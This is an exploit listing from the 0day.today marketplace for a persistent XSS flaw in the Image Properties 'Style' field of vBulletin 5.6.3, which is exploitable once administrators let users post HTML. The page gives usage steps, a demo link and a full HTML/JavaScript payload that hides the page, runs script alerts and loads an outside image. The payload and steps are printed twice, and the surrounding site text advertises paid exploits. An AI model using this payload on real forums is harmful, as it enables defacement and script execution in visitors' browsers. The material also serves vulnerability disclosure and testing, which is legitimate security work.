0day.today - Il più grande database di exploit nel mondo.
Utilizziamo un dominio principale DOMAIN_LINK
Se vuoi acquistare l'exploit o ottenerlo, devi comprare i Gold. Non vogliamo che utilizzi i tool di hacking per atttività illecite sul nostro sito web, quindi ogni azione può avere effetti illegali su utenti e sul nostro sito web verrai bannato. ed il tuo account con i tuoi dati verranno distrutti.
L'amministrazione del sito usa contatti ufficiali. Attenzione agli istruttori!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Leggere il [ accordo ]
- Leggere il [ Submit ] regole
- Visita il [ faq ] page
- [ Registrati ] profilo
- ottieni [ Oro ]
- Se vuoi [ vendere ]
- Se vuoi [ comprare ]
- se hai perso [ Account ]
- Qualsiasi domanda [ [email protected] ]
- Autorizzazione della Pagina
- Registrazione della pagina
- Ripristina l'account della pagina
- FAQ pagina
- Pagina dei contatti
- Regole di pubblicazione
- Pagina degli accordi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contattaci
Ci puoi contattare tramite:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
vBulletin 5.6.3 Persistent XSS Image Properties Vulnerability
[ 0Day-ID-34885 ]
Titolo
vBulletin 5.6.3 Persistent XSS Image Properties Vulnerability
[ Highlight ]
Highlight - is paid service, that can help to get more visitors to your material.
Price:
Price:
Data inserimento
Categoria
Piattaforma
Verificato
Prezzo
FREE
Rischio
[Security Risk High
]Rel. releases
Descrizione
Click Image Properties in the Pmchat or Topic on the forum and we can see that field "Style" vulnerable to cross site scripting.
Usage info
Put xss code in the field and click "post reply". And we have a persistent xss. XSS attack can be use only by the administrator. He will not do this.
Can a user do this? Yes. If the administrator changes the settings.
Settings for change and tests:
Admin CP - Channel Permissions Manager - Edit Registered Users-Can Use HTML - yes. And we can see the rule : "Security Risk: Enabling HTML for untrusted users can expose your site to security risks and exploitation".
We found a vulnerable field and tested how it works if we change the security settings. But there may be(?) other ways to exploit this bug.
Example page with Persistent XSS:
https://8289cfe4157f-041544.demo.vbulletin.net/forum/main-forum/82-hello
XSS CODE (i like a big code;)):
""><style>body{visibility:hidden;} html{background-color: Black;}</style><div style="position: absolute;left: 420px;top: 40px;%E2%80%8B%E2%80%8Bz-index: 10;visibility: visible; color: Green; font-size: 40px;"><script>alert("Persistent XSS")</script><script>alert("vBulletin 5.6.3")</script><script>alert("by XSS Maker Vincent ibn Winnie")</script><img src="https://i.gifer.com/Ltvw.gif " style="height: 300px; width: 400px;" alt=".."><br>Cross site scripting is here..;)<br></img><iframe>
Can a user do this? Yes. If the administrator changes the settings.
Settings for change and tests:
Admin CP - Channel Permissions Manager - Edit Registered Users-Can Use HTML - yes. And we can see the rule : "Security Risk: Enabling HTML for untrusted users can expose your site to security risks and exploitation".
We found a vulnerable field and tested how it works if we change the security settings. But there may be(?) other ways to exploit this bug.
Example page with Persistent XSS:
https://8289cfe4157f-041544.demo.vbulletin.net/forum/main-forum/82-hello
XSS CODE (i like a big code;)):
""><style>body{visibility:hidden;} html{background-color: Black;}</style><div style="position: absolute;left: 420px;top: 40px;%E2%80%8B%E2%80%8Bz-index: 10;visibility: visible; color: Green; font-size: 40px;"><script>alert("Persistent XSS")</script><script>alert("vBulletin 5.6.3")</script><script>alert("by XSS Maker Vincent ibn Winnie")</script><img src="https://i.gifer.com/Ltvw.gif " style="height: 300px; width: 400px;" alt=".."><br>Cross site scripting is here..;)<br></img><iframe>
Venditore
https://www.vbulletin.com/en/vb5-trial/
Versioni affette
5.6.3
Testato su
Windows 10 Mozilla Firefox and Opera
Prooves Information
Video proof
Other Information
Abuses
0
Commenti
0
Visualizzazioni
2 336
We DO NOT use Telegram or any messengers / social networks! Please, beware of scammers!
FREE
Open Exploit
You can open this source code for free
You can open this source code for free
Verified by
Verified by
This material is checked by Administration and absolutely workable.
This material is checked by Administration and absolutely workable.
[ Commenti: 0 ]
Terms of use of comments:
- Users are forbidden to exchange personal contact details
- Haggle on other sites\projects is forbidden
- Reselling is forbidden
Entra o registrati per lasciare un commento
Entra o registrati per lasciare un commento